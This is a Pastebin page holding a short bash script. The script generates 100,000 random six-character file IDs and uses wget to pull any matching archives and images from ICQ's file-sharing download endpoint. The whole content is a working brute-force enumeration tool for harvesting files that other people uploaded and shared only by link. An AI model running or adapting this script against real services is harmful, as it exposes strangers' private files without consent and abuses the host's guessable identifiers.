Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- baseURL="http://files.icq.net/files/get?fileId="
- for i in {1..100000}; do
- fileID=`cat /dev/urandom | tr -dc 'A-Z0-9' | fold -w 6 | head -n 1`
- echo $fileID
- #curl -Of#L "$baseURL$fileID"
- wget -c -t 2 -T 5 -A ".zip,.rar,.7z,.jpg,.jpeg,.bmp,.png,.gif" "$baseURL$fileID"
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement